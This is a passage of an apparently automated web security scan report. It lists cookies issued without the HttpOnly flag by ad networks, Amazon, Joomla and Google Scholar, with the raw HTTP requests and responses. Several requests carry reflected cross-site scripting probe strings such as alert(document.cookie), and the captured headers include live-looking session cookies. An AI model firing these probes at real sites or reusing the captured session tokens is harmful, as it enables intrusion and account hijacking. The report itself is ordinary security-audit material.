Cookie: uid=3011330574290390485; adImpCount=uSIG8d80kGSu-3LVteb8dYo27UqqnCnwkfrXKyAV6Vld6ISB_q_vS5rapRhLZ6kjS6LzB--IPpW7f2lvGgmbV44a2HHwK-7WUoZJXI4UNi7dHrH8JOOm_45w1VVsmbQ-LO5mu_1bsdW1DTvfN8mMduV530E-cnnyNakd9XAJ5pw; fc=1WiKwfBkd2IP9DmYEvBTXecjeUUpq7AdXdV5QaZ3XbQBKx4ZZQvbzWrTNs9TlBo5BZ0EL66upofk3HmGTS_1gr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; pf=ZNcym7VfDvuGzV9XuIE1r-QUWOHC4vVDwY-zzeE9S_KJwV9kSIzX4BtZ7vBDkFqiRgnA1fZrADJXYuYVL1y1CX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7Cundefined%7C10; rds=14987%7C14983%7C14999%7C14989%7Cundefined%7C14983%7C14983%7C14983%7C14983%7C14983%7C14987%7Cundefined%7C14983; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 24-Jul-2011 01:35:46 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Tue, 25 Jan 2011 01:35:45 GMT

GIF89a.............!.......,...........D..;

14.549. http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • C2=cHgPNJpwIg02FsGCdbdBrhgohXwawOoAM/oROK7YDwAoGX7r1VQcKa8mGKGBI9YRVP53FkL3Fy5gPbw6TVIwsu2B/0mBOea7IIaWGsmgigQvJVAc; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
  • ROLL=v5Q2U0M!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
  • 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
  • 5764026402=_4d3dea59,5764026402,772178^924994^87^0,1_; domain=advertising.com; path=/click
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ACID=Bc330012940999670074; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; ROLL=v5Q2V0M9itzqEXE!;

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 24 Jan 2011 22:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Set-Cookie: C2=cHgPNJpwIg02FsGCdbdBrhgohXwawOoAM/oROK7YDwAoGX7r1VQcKa8mGKGBI9YRVP53FkL3Fy5gPbw6TVIwsu2B/0mBOea7IIaWGsmgigQvJVAc; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:49:00 GMT; path=/
Set-Cookie: 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
Set-Cookie: 5764026402=_4d3dea59,5764026402,772178^924994^87^0,1_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:49:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

14.550. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; expires=Mon, 21-Feb-2011 22:03:20 GMT; path=/; domain=r1-ads.ace.advertising.com
  • C2=ocfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
  • F1=Bgy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
  • BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
  • ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
  • 49004778=_4d3df728,7545040742,772178^924994^87^0,0_; domain=advertising.com; path=/click
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:03:20 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 22:03:20 GMT
Connection: close
Set-Cookie: A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; expires=Mon, 21-Feb-2011 22:03:20 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: C2=ocfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: F1=Bgy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: 49004778=_4d3df728,7545040742,772178^924994^87^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cs
...[SNIP]...

14.551. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • C2=kcfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
  • F1=BQy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
  • BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
  • ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
  • 49004778=_4d3df724,5208681003,772178^924994^87^0,0_; domain=advertising.com; path=/click
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:03:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Date: Mon, 24 Jan 2011 22:03:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=kcfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: F1=BQy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:16 GMT; path=/
Set-Cookie: 49004778=_4d3df724,5208681003,772178^924994^87^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cs
...[SNIP]...

14.552. http://rcm.amazon.com/e/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /e/cm?t=parenthoodcom-20&o=1&p=8&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1 HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-token=Z2JSK2RoUn+3UMHwG7/GMLAwP03jsMX2IupgD8XjIWL/cWEmFwNPxyjc+zvmeSxHFRri2WjEoaTthJUtEq8EAL61ozW8DRERMFViffbf4t9K0iQzlFKBaFiYf9vzLMP7fsKMskc0pEdBhkFJzjZjmTFuuFcjAIQqpefiCQpUp1OGTQNkcOqpUWmgyA0iAScPLbkwsq14aJ6RQliVt1HPt64kToJxXKmZWZXgpLdM8HZ79M0ij5nOCXDOxmXxRdkg; ubid-main=184-7948791-6690213; session-id-time=2082787201l; session-id=175-4977389-9084947; apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:01 GMT
Server: Server
Set-Cookie: apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 4168
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...

14.553. http://rd.apmebf.com/w/pg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/pg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 01:35:48 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/pg?cont_id=11&d=f&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=fks3qs-58150-1294536375707-a5

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 01:35:48 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 01:35:48 GMT
Location: http://media.fastclick.net/w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/pg?cont_id=11&amp;
...[SNIP]...

14.554. http://resources.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 041c772b92563f566daacce0f3f536ce=73c091fa2712ba7bf2c2185c73695000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=73c091fa2712ba7bf2c2185c73695000; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...

14.555. http://resources.joomla.org/directory/advsearch.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /directory/advsearch.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 041c772b92563f566daacce0f3f536ce=089d7ea1d8ba80fb168608272f1090c1; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directory/advsearch.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=089d7ea1d8ba80fb168608272f1090c1; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...

14.556. http://resources.joomla.org/directory/new.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /directory/new.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 041c772b92563f566daacce0f3f536ce=0b0ec261643fa10923bfbfaa489de5ba; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directory/new.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=0b0ec261643fa10923bfbfaa489de5ba; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...

14.557. http://resources.joomla.org/how-to-add-listings.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /how-to-add-listings.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 041c772b92563f566daacce0f3f536ce=d7fb4f14f3981668855c2cc50303ff38; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /how-to-add-listings.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=d7fb4f14f3981668855c2cc50303ff38; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...

14.558. http://scholar.google.com/schhp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /schhp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • GSP=ID=b5f8ca2c9be5aa39; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
